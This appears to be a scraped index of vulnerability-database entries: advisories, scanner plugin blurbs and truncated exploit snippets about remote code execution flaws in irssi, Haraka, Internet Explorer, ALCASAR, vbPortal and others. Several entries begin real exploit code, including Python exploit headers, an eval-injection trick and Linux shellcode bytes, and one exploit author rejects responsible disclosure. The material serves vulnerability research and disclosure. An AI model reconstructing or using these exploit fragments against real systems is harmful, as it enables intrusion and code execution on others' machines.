FreeBSD : irssi -- use-after-free potential code execution (06f931c0-0be0-11e7-b4bf-5404a68ad561)

The irssi project reports : Use after free while producing list of netjoins CWE-416. This issue was found and reported to us by APic. This issue usually leads to segmentation faults. Targeted code execution should be difficult. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive...

Haraka 2.8.9 - Remote Command Execution

Haraka 2.8.9 - Remote Command Execution !/usr/bin/python Exploit Title: Harakiri ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection Exploit Author: xychix xychix at hotmail.com / mark at outflank.nl Date: 26 Januar...

MS11-030: Vulnerability in DNS Resolution could allow remote code execution: April 12, 2011

MS11-030: Vulnerability in DNS Resolution could allow remote code execution: April 12, 2011 INTRODUCTION Microsoft has released security bulletin MS11-030. To view the complete security bulletin, visit one of the following Microsoft websites: Home users:...

KLA10879 Multiple vulnerabilities in Adobe Flash Player

Multiple serious vulnerabilities have been found in Adobe Flash Player. Malicious users can exploit these vulnerabilities to execute arbitrary code or bypass security restrictions. Below is a complete list of vulnerabilities 1. Type confusion, use-after-free and memory corruption vulnerabilities...

Metasploit Web UI Static secret_key_base Value

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule NullSerializer @serializer = options:serializer || Marshal end def encryptandsignvalue...

Microsoft Visio Remote Code Execution Vulnerability (3124585)

This host is missing a critical security update according to Microsoft Bulletin MS16-004 SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD : libtremor -- memory corruption (40497e81-fee3-4e54-9d5f-175a5c633b73)

The Mozilla Project reports : Security researcher regenrecht reported via TippingPoint's Zero Day Initiative the possibility of memory corruption during the decoding of Ogg Vorbis files. This can cause a crash during decoding and has the potential for remote code execution. %NASLMINLEVEL 70300 C...

ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability

Exploit for php platform in category web applications !/usr/bin/env python -- coding: utf-8 -- ALCASAR = 2.8.1 Remote Root Code Execution Vulnerability Author: eF Date : 2014-09-12 URL : http://www.alcasar.net/ This is not a responsible disclosure coz' I have no sense of ethics and I don't give a...

ActualAnalyzer Lite 2.81 - Command Execution

ActualAnalyzer exploit. Tested on Lite version We load command into a dummy variable as we only have 6 characters to own the eval but load more as first 2 characters get rm'd. We then execute the eval with backticks. 11/05/2011 import urllib import urllib2 import sys import time def banner: print...

RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution

Added: 10/22/2010 CVE: CVE-2010-3747 BID: 44144 OSVDB: 68673 Background RealPlayer and RealOne Player include a number of ActiveX controls allowing functions to be called by scripts embedded in web pages. Problem CDDA cdda:// is a protocol used to locate media files on Compact Disc Digital Audio...

VUPEN Security Research - Microsoft Internet Explorer &quot;CIframeElement&quot; Object Use-after-free Vulnerability &#40;CVE-2010-2558&#41;

VUPEN Security Research - Microsoft Internet Explorer "CIframeElement" Object Use-after-free Vulnerability CVE-2010-2558 http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Microsoft Internet Explorer is a web browser developed by Microsoft and included as part of the...

Microsoft IE基线标签渲染远程代码执行漏洞（MS10-002）

BUGTRAQ ID: 37895 CVE ID: CVE-2010-0245 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 如果交错的strike和center标签中包含用用于操控sub或sup等字体基线的元素的话，则在IE渲染该标签时存在释放后使用错误。在删除这个元素指针的时候，IE之后会引用已被释放的指针。 攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。 Microsoft Internet Explorer 8.0 临时解决方法： 将Internet...

Fedora 9 : mantis-1.1.2-1.fc9 (2008-6647)

Update to upstream version 1.1.2, fixing following security issues: - 0008974: XSS Vulnerability in filters - 0008975: CSRF Vulnerabilities in usercreate CVE-2008-2276 - 0008976: Remote Code Execution in admconfig - 0009154: arbitrary file inclusion through user preferences page See upstream...

CVE-2008-0986

Integer overflow in the BMP::readFromStream method in the libsgl.so library in Google Android SDK m3-rc37a and earlier, and m5-rc14, allows remote attackers to execute arbitrary code via a crafted BMP file with a header containing a negative offset field...

vbPortal 3.0.2 &lt; 3.6.0 b1 - &#039;cookie&#039; Remote Code Execution

!/usr/bin/php -q -d shortopentag=on this works with magicquotesgpc=Off\r\n"; echo "dork: Portal By vbPortal Version 3.5.0 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $con...

DSA-995-1 metamail - buffer overflow

Bulletin has no description...

Debian DSA-866-1 : mozilla - several vulnerabilities

Several security-related problems have been discovered in Mozilla and derived programs. The Common Vulnerabilities and Exposures project identifies the following problems : - CAN-2005-2871 Tom Ferris discovered a bug in the IDN hostname handling of Mozilla that allows remote attackers to cause a...

Debian DSA-723-1 : xfree86 - buffer overflow

A buffer overflow has been discovered in the Xpm library which is used in XFree86. A remote attacker could provide a specially crafted XPM image that could lead to the execution of arbitrary code. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this...

Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 &#40;10.04.2005&#41;

Summary: Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 10.04.2005 http://www.goldenftpserver.com/ Details: Passing an overly long username parameter to the FTP server causes the EIP register to be overwritten after the USER/PASS login sequence is completed. Once this has been do...

23laeon.c.txt

/ local linux exploit within aeon-0.2a Coded by patr0n security-tmp.h14.ru / define BUFLEN 533 define PATH "/home/research/aeon-0.2a/aeon" char shellcode= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" "\xc0\x88\x43\x07\x89\x5b\x08\x89" "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"...